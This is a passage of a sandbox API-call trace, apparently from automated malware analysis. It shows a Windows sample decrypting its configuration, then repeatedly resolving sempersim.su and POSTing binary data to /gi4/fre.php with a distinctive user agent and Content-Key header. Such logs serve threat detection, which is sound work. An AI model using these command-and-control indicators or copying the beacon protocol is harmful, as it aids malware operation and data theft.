RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0282.816] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0282.817] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0282.817] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0282.818] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0282.818] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0282.819] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0282.819] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0282.820] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0282.820] GetProcessHeap () returned 0x5b0000 [0282.820] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0282.820] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0282.820] GetProcessHeap () returned 0x5b0000 [0282.820] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0282.820] GetProcessHeap () returned 0x5b0000 [0282.821] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0282.821] GetProcessHeap () returned 0x5b0000 [0282.821] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3470 | out: hHeap=0x5b0000) returned 1 [0282.821] GetProcessHeap () returned 0x5b0000 [0282.821] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3110 [0282.822] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0282.822] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0282.831] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0282.831] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5a20) returned 1 [0282.839] GetProcessHeap () returned 0x5b0000 [0282.839] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8560 [0282.840] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0282.840] CryptImportKey (in: hProv=0x5c5a20, pbData=0x5c8560, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0282.840] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0282.841] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0282.841] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0282.841] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0282.842] GetProcessHeap () returned 0x5b0000 [0282.842] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8560 | out: hHeap=0x5b0000) returned 1 [0282.842] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0282.845] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3110, pdwDataLen=0xdfcfc | out: pbData=0x5d3110, pdwDataLen=0xdfcfc) returned 1 [0282.846] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0282.846] CryptDestroyKey (hKey=0x5be288) returned 1 [0282.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0282.847] CryptReleaseContext (hProv=0x5c5a20, dwFlags=0x0) returned 1 [0282.847] GetProcessHeap () returned 0x5b0000 [0282.847] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5298 [0282.847] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0282.848] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0282.848] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0282.848] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0282.849] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0282.849] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0282.849] GetProcessHeap () returned 0x5b0000 [0282.849] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0282.849] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cde80*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf428*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0282.851] GetProcessHeap () returned 0x5b0000 [0282.851] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa40 [0282.851] socket (af=2, type=1, protocol=6) returned 0x3e4 [0282.851] connect (s=0x3e4, name=0x5cf428*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0282.920] FreeAddrInfoW (pAddrInfo=0x5cde80*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf428*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0282.920] GetProcessHeap () returned 0x5b0000 [0282.920] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5910 [0282.920] GetProcessHeap () returned 0x5b0000 [0282.920] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0282.922] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0282.922] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0282.922] GetProcessHeap () returned 0x5b0000 [0282.922] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0282.922] GetProcessHeap () returned 0x5b0000 [0282.923] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0282.923] GetProcessHeap () returned 0x5b0000 [0282.923] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d31e8 [0282.923] GetProcessHeap () returned 0x5b0000 [0282.923] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0282.924] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0282.924] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0282.924] GetProcessHeap () returned 0x5b0000 [0282.924] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0282.925] GetProcessHeap () returned 0x5b0000 [0282.925] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0282.925] send (s=0x3e4, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0282.926] send (s=0x3e4, buf=0x5d1e18*, len=159, flags=0) returned 159 [0282.926] GetProcessHeap () returned 0x5b0000 [0282.926] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0282.926] recv (in: s=0x3e4, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0284.212] GetProcessHeap () returned 0x5b0000 [0284.213] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0284.213] GetProcessHeap () returned 0x5b0000 [0284.213] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d31e8 | out: hHeap=0x5b0000) returned 1 [0284.213] GetProcessHeap () returned 0x5b0000 [0284.213] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0284.213] GetProcessHeap () returned 0x5b0000 [0284.214] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5910 | out: hHeap=0x5b0000) returned 1 [0284.214] closesocket (s=0x3e4) returned 0 [0284.215] GetProcessHeap () returned 0x5b0000 [0284.215] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa40 | out: hHeap=0x5b0000) returned 1 [0284.215] GetProcessHeap () returned 0x5b0000 [0284.215] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5298 | out: hHeap=0x5b0000) returned 1 [0284.216] GetProcessHeap () returned 0x5b0000 [0284.216] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3110 | out: hHeap=0x5b0000) returned 1 [0284.216] GetProcessHeap () returned 0x5b0000 [0284.216] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0284.216] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xc58) returned 0x3e4 [0284.218] Sleep (dwMilliseconds=0xea60) [0284.236] GetProcessHeap () returned 0x5b0000 [0284.236] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3500 [0284.236] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0284.237] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0284.244] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0284.244] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5998) returned 1 [0284.254] GetProcessHeap () returned 0x5b0000 [0284.254] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0284.255] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0284.255] CryptImportKey (in: hProv=0x5c5998, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0284.256] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0284.256] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0284.256] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0284.257] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0284.257] GetProcessHeap () returned 0x5b0000 [0284.257] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0284.258] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0284.258] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3500, pdwDataLen=0xdfcfc | out: pbData=0x5d3500, pdwDataLen=0xdfcfc) returned 1 [0284.259] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0284.259] CryptDestroyKey (hKey=0x5be288) returned 1 [0284.260] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0284.260] CryptReleaseContext (hProv=0x5c5998, dwFlags=0x0) returned 1 [0284.260] GetProcessHeap () returned 0x5b0000 [0284.261] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5f88 [0284.261] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0284.262] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0284.262] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0284.263] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0284.263] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0284.264] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0284.268] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0284.268] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0284.268] GetProcessHeap () returned 0x5b0000 [0284.268] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb100 [0284.268] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0284.269] GetProcessHeap () returned 0x5b0000 [0284.269] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb100 | out: hHeap=0x5b0000) returned 1 [0284.269] GetProcessHeap () returned 0x5b0000 [0284.270] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5f88 | out: hHeap=0x5b0000) returned 1 [0284.270] GetProcessHeap () returned 0x5b0000 [0284.270] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3500 | out: hHeap=0x5b0000) returned 1 [0284.270] GetProcessHeap () returned 0x5b0000 [0284.270] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3668 [0284.271] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0284.271] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0284.276] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0284.276] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0284.287] GetProcessHeap () returned 0x5b0000 [0284.287] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0284.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0284.288] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0284.289] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0284.289] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0284.290] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0284.290] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0284.290] GetProcessHeap () returned 0x5b0000 [0284.290] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0284.291] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0284.291] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3668, pdwDataLen=0xdfcfc | out: pbData=0x5d3668, pdwDataLen=0xdfcfc) returned 1 [0284.292] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0284.292] CryptDestroyKey (hKey=0x5be288) returned 1 [0284.293] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0284.293] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0284.293] GetProcessHeap () returned 0x5b0000 [0284.293] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0284.294] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0284.294] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0284.294] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0284.295] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0284.295] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0284.296] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0284.296] GetProcessHeap () returned 0x5b0000 [0284.299] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb100 [0284.299] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cde80*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf428*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0284.302] GetProcessHeap () returned 0x5b0000 [0284.302] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca940 [0284.302] socket (af=2, type=1, protocol=6) returned 0x3e8 [0284.303] connect (s=0x3e8, name=0x5cf428*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0284.385] FreeAddrInfoW (pAddrInfo=0x5cde80*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf428*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0284.385] GetProcessHeap () returned 0x5b0000 [0284.385] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5888 [0284.385] GetProcessHeap () returned 0x5b0000 [0284.385] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0284.388] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0284.390] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0284.390] GetProcessHeap () returned 0x5b0000 [0284.390] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0284.390] GetProcessHeap () returned 0x5b0000 [0284.391] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0284.391] GetProcessHeap () returned 0x5b0000 [0284.391] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d32c0 [0284.391] GetProcessHeap () returned 0x5b0000 [0284.391] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0284.392] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0284.393] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0284.393] GetProcessHeap () returned 0x5b0000 [0284.393] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0284.394] GetProcessHeap () returned 0x5b0000 [0284.394] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0284.394] send (s=0x3e8, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0284.395] send (s=0x3e8, buf=0x5d1e18*, len=159, flags=0) returned 159 [0284.395] GetProcessHeap () returned 0x5b0000 [0284.395] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0284.395] recv (in: s=0x3e8, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0285.737] GetProcessHeap () returned 0x5b0000 [0285.737] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0285.737] GetProcessHeap () returned 0x5b0000 [0285.738] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d32c0 | out: hHeap=0x5b0000) returned 1 [0285.738] GetProcessHeap () returned 0x5b0000 [0285.738] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0285.738] GetProcessHeap () returned 0x5b0000 [0285.738] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5888 | out: hHeap=0x5b0000) returned 1 [0285.738] closesocket (s=0x3e8) returned 0 [0285.739] GetProcessHeap () returned 0x5b0000 [0285.739] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca940 | out: hHeap=0x5b0000) returned 1 [0285.739] GetProcessHeap () returned 0x5b0000 [0285.739] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0285.739] GetProcessHeap () returned 0x5b0000 [0285.740] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3668 | out: hHeap=0x5b0000) returned 1 [0285.740] GetProcessHeap () returned 0x5b0000 [0285.740] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb100 | out: hHeap=0x5b0000) returned 1 [0285.740] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xcbc) returned 0x3e8 [0285.742] Sleep (dwMilliseconds=0xea60) [0285.749] GetProcessHeap () returned 0x5b0000 [0285.749] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2f60 [0285.750] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0285.750] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0285.756] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0285.757] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0285.764] GetProcessHeap () returned 0x5b0000 [0285.764] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8620 [0285.765] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0285.765] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c8620, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0285.768] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0285.768] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0285.769] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0285.769] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0285.769] GetProcessHeap () returned 0x5b0000 [0285.770] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8620 | out: hHeap=0x5b0000) returned 1 [0285.770] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0285.771] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2f60, pdwDataLen=0xdfcfc | out: pbData=0x5d2f60, pdwDataLen=0xdfcfc) returned 1 [0285.771] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0285.772] CryptDestroyKey (hKey=0x5be288) returned 1 [0285.772] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0285.772] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0285.773] GetProcessHeap () returned 0x5b0000 [0285.773] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5f88 [0285.773] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0285.773] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0285.774] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0285.774] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0285.775] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0285.775] StrStrA 